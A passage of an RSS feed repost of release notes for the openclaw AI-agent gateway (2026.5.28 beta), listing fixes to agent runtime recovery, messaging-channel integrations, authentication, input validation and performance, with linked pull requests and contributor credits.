<li>Policy: add policy comparison, ingress-channel conformance, and sandbox-posture conformance checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4506435604" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85572" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85572/hovercard" href="https://github.com/openclaw/openclaw/pull/85572">#85572</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508594455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85744" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85744/hovercard" href="https://github.com/openclaw/openclaw/pull/85744">#85744</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521746245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86768" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86768/hovercard" href="https://github.com/openclaw/openclaw/pull/86768">#86768</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Agents: fall back to local config pruning when the optional <code>agents delete</code> Gateway probe cannot authenticate, so offline installs can still delete agents without removing shared workspaces.</li>
<li>Tighten phone-control mutation authorization [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529379329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87150" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87150/hovercard" href="https://github.com/openclaw/openclaw/pull/87150">#87150</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Clarify directive persistence authorization policy [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515051227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86369" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86369/hovercard" href="https://github.com/openclaw/openclaw/pull/86369">#86369</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Agents/Codex: keep spawned agent cwd/workspace state separated, keep hook context prompt-local, release session locks on timeout abort and runtime teardown, avoid session event queue self-wait, clean up exec abort listeners, stream assistant deltas incrementally, recover raw missing-thread compaction failures, preserve shared app-server state across startup or helper failures, keep native hook relay alive across restarts and prune stale bridge files, keep Claude live tool progress visible for watchdog recovery, suppress abandoned requester completion handoff, route workspace memory through tools, resolve Codex runtime models first, report quarantined dynamic tools, format <code>skills</code> command output, and bound compaction/steering retries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512236257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86123/hovercard" href="https://github.com/openclaw/openclaw/pull/86123">#86123</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" href="https://github.com/openclaw/openclaw/pull/87399">#87399</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534684461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87375" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332970426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72574" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72574/hovercard" href="https://github.com/openclaw/openclaw/issues/72574">#72574</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534791510" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87383/hovercard" href="https://github.com/openclaw/openclaw/pull/87383">#87383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535326369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87400" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87400/hovercard" href="https://github.com/openclaw/openclaw/pull/87400">#87400</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462962983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83022" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83022/hovercard" href="https://github.com/openclaw/openclaw/pull/83022">#83022</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541273558" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87671" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87671/hovercard" href="https://github.com/openclaw/openclaw/pull/87671">#87671</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542561311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87738" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87738/hovercard" href="https://github.com/openclaw/openclaw/pull/87738">#87738</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542726387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87747" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87747/hovercard" href="https://github.com/openclaw/openclaw/pull/87747">#87747</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542013718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87706/hovercard" href="https://github.com/openclaw/openclaw/pull/87706">#87706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538196198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87546" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87546/hovercard" href="https://github.com/openclaw/openclaw/pull/87546">#87546</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538136913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87541" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87541/hovercard" href="https://github.com/openclaw/openclaw/pull/87541">#87541</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alix-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alix-007">@Alix-007</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjf">@sjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels: thread canonical session keys into outbound hooks, preserve Matrix room-id case, keep fallback tool warnings mention-inert, retain delivered Slack final replies during late cleanup, continue iMessage polling after denied reactions, suppress duplicate native exec approvals, preserve Telegram SecretRef prompt config and polling keepalives, preserve WhatsApp profile auth roots, QR display, document filenames, and plugin hook config, suppress Discord recovered tool warnings, preserve the Discord voice outbound helper, and block untrusted Teams service URLs while keeping TeamsSDK patterns aligned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536746747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87465" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87465/hovercard" href="https://github.com/openclaw/openclaw/pull/87465">#87465</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370029391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76262" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76262/hovercard" href="https://github.com/openclaw/openclaw/pull/76262">#76262</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465217648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83304/hovercard" href="https://github.com/openclaw/openclaw/pull/83304">#83304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538876168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87581" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87581/hovercard" href="https://github.com/openclaw/openclaw/pull/87581">#87581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374077022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/77114" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/77114/hovercard" href="https://github.com/openclaw/openclaw/pull/77114">#77114</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515934850" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86426" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86426/hovercard" href="https://github.com/openclaw/openclaw/pull/86426">#86426</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505928215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85529" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85529/hovercard" href="https://github.com/openclaw/openclaw/pull/85529">#85529</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529579598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87160" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87160/hovercard" href="https://github.com/openclaw/openclaw/pull/87160">#87160</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lukeboyett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lukeboyett">@lukeboyett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaotian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaotian">@xiaotian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heyitsaamir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heyitsaamir">@heyitsaamir</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amittell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amittell">@amittell</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liorb-mountapps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liorb-mountapps">@liorb-mountapps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/masatohoshino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/masatohoshino">@masatohoshino</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bladin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bladin">@bladin</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/auth/doctor/providers: reject malformed numeric/timeout/subcommand-version inputs, ignore workspace dotenv provider credentials, wait for respawn child shutdown, bound Codex and GitHub Copilot OAuth/token requests, harden Codex auth probes, warm provider auth off the main thread, honor Codex response timeouts, stop migrating current Claude Haiku 4.5 profiles to Sonnet, bound local service startup, resolve GPT-5.5 without cached catalog, migrate legacy memory auto-provider config, rewrite non-canonical <code>api_key</code> auth profiles, and make doctor restart follow-ups actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4470260031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83655" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83655/hovercard" href="https://github.com/openclaw/openclaw/pull/83655">#83655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4538477112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87559/hovercard" href="https://github.com/openclaw/openclaw/pull/87559">#87559</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542269022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87719/hovercard" href="https://github.com/openclaw/openclaw/pull/87719">#87719</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nxmxbbd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nxmxbbd">@nxmxbbd</a>.</li>
<li>Gateway/security/session state: expire browser tokens after auth rotation, scope assistant idempotency dedupe, drain probe client closes, avoid stale restart continuation reuse, preserve retry-after fallbacks and stale rate-limit cooldown probes, bound webchat image and artifact transcript scans, include seconds in inbound metadata timestamps, clear completed session active runs, and evict current plugin-state namespaces at row caps. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544450672" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87810/hovercard" href="https://github.com/openclaw/openclaw/pull/87810">#87810</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544792832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87833" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87833/hovercard" href="https://github.com/openclaw/openclaw/pull/87833">#87833</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Config/parsing/network: reject partial numeric parsing, parse provider/Discord retry headers and dates strictly, honor IPv6 and bare IPv6 <code>no_proxy</code> entries, canonicalize secret target array indexes, and reject malformed media content lengths, inspected TCP ports, marketplace content lengths, cron epochs, sandbox stat fields, unsafe duration values, empty config path segments, noncanonical schema array refs, unsafe Telegram callback pages, and invalid Teams attachment-fetch DNS targets.</li>
<li>Browser/input hardening: reject invalid tab indexes, excessive viewport resizes, explicit zero CDP ports, malformed geolocation options, unsafe screenshot or permission-grant timeouts, loose response-body limits, invalid cookie expiries, and non-finite Browser tool delays/timeouts.</li>
<li>Cron/automation: retry recurring jobs after transient model rate limits before waiting for the next scheduled slot, and preflight model fallbacks before skipping scheduled work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462211584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82887" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82887/hovercard" href="https://github.com/openclaw/openclaw/pull/82887">#82887</a>)</li>
<li>Auto-reply/directives: respect provider and relayed channel metadata during directive persistence so channel-originated decisions keep their intended context. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541541082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87683" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87683/hovercard" href="https://github.com/openclaw/openclaw/pull/87683">#87683</a>)</li>
<li>WhatsApp: resolve the auth directory from the active profile so profile-scoped WhatsApp installs do not drift to the wrong credential root. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459071895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82492" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82492/hovercard" href="https://github.com/openclaw/openclaw/pull/82492">#82492</a>)</li>
<li>Gateway/session state: clear completed session active runs, avoid cold-loading providers for MCP inventory, cache single-session child indexes, cap handshake timers, and bound preauth, auth-guard, media, transcript, readiness, and port options.</li>
<li>Channels/replies: preserve channel-owned progress callbacks when verbose output is off, keep group-room progress suppression intact, prefer external session delivery context, escape Discord component id delimiters, force final TUI chat repaints, show Slack reasoning previews, and normalize Discord/Matrix/Mattermost channel numeric options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537084392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87476" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87476/hovercard" href="https://github.com/openclaw/openclaw/pull/87476">#87476</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535879311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87423" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87423/hovercard" href="https://github.com/openclaw/openclaw/pull/87423">#87423</a>)</li>
<li>Agents/tool args: harden smart-quoted argument repair for edit arrays and exact escaped arguments so model-produced tool calls recover without corrupting valid input. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4519020723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86611/hovercard" href="https://github.com/openclaw/openclaw/pull/86611">#86611</a>)</li>
<li>Providers/agents: preserve seeded Anthropic signatures, preserve signed thinking payloads, concatenate signature-delta chunks, preserve DeepSeek <code>reasoning_content</code> replay across tier suffixes, apply OpenRouter strict9 ids to Mistral routes, promote Ollama plain-text tool calls, load NVIDIA featured model catalogs, stream MiniMax music generation responses, and recover empty preflight compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539098619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87593/hovercard" href="https://github.com/openclaw/openclaw/pull/87593">#87593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537557512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87493" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87493/hovercard" href="https://github.com/openclaw/openclaw/pull/87493">#87493</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4424322077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80775" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80775/hovercard" href="https://github.com/openclaw/openclaw/pull/80775">#80775</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4491159526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84764" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84764/hovercard" href="https://github.com/openclaw/openclaw/pull/84764">#84764</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Media/images: skip CLI image cache refs when resolving generated images and bound generated video downloads so stale refs and slow providers fail cleanly. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537825609" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87523" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87523/hovercard" href="https://github.com/openclaw/openclaw/pull/87523">#87523</a>)</li>
<li>File transfer: handle late tar stdin pipe errors after archive validation or unpacking has already settled.</li>
<li>Performance: trust install-record caches between reloads, prefer native JSON parsing, reuse unchanged tool-search catalogs, skip unchanged store serialization, add precomputed session patch writers, reduce store clone allocations, cache manifest model catalog rows and auto-enabled plugin config, avoid full session snapshots for entry reads, defer configured Slack full startup, prefer bundled plugin dist entries, and slim current metadata identity caches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542943848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87760" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87760/hovercard" href="https://github.com/openclaw/openclaw/pull/87760">#87760</a>)</li>
<li>Docker/release/QA: package runtime workspace templates, stream cross-OS served artifacts, preserve sparse Crabbox run artifacts, isolate npm plugin installs per package, reject incompatible package plugin API installs, bound OpenClaw instance logs, plugin gauntlet relay logs, MCP channel buffers, kitchen-sink scans, agent-turn assertions, and release scenario logs, and keep release/google live guards current. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540781098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87647" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87647/hovercard" href="https://github.com/openclaw/openclaw/pull/87647">#87647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537087511" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87477/hovercard" href="https://github.com/openclaw/openclaw/pull/87477">#87477</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rohitjavvadi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rohitjavvadi">@rohitjavvadi</a>.</li>
<li>Release/CI: bound manual git fetches, ClawHub verifier responses, ClawHub owner metadata, Parallels limits, startup/test/memory budget parsing, and diffs viewer build warnings so release lanes fail with useful proof instead of hanging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544909025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87839" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87839/hovercard" href="https://github.com/openclaw/openclaw/pull/87839">#87839</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.28-beta.1]]></title>
<description><![CDATA[2026.5.28
Highlights

Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime st...]]></description>
<link>https://tsecurity.de/de/3556097/downloads/openclaw-2026528-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556097/downloads/openclaw-2026528-beta1/</guid>
<pubDate>Fri, 29 May 2026 07:03:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.28</h2>
<h3>Highlights</h3>
<ul>
<li>Agent and Codex runtime recovery is steadier: subagents keep cwd/workspace separation, hook context stays prompt-local, session locks release on timeout abort, stale restart continuations are avoided, and Codex app-server/helper failures no longer tear down shared runtime state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4530733870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87218/hovercard" href="https://github.com/openclaw/openclaw/pull/87218">#87218</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523882966" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86875" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86875/hovercard" href="https://github.com/openclaw/openclaw/pull/86875">#86875</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535658120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87409" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87409/hovercard" href="https://github.com/openclaw/openclaw/pull/87409">#87409</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535300059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87399" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87399/hovercard" 